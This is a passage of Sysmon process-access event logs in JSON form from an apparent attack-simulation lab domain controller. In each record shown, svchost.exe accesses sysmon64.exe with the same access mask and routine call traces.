1 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2203,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2204,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:28.986\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:28.986","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
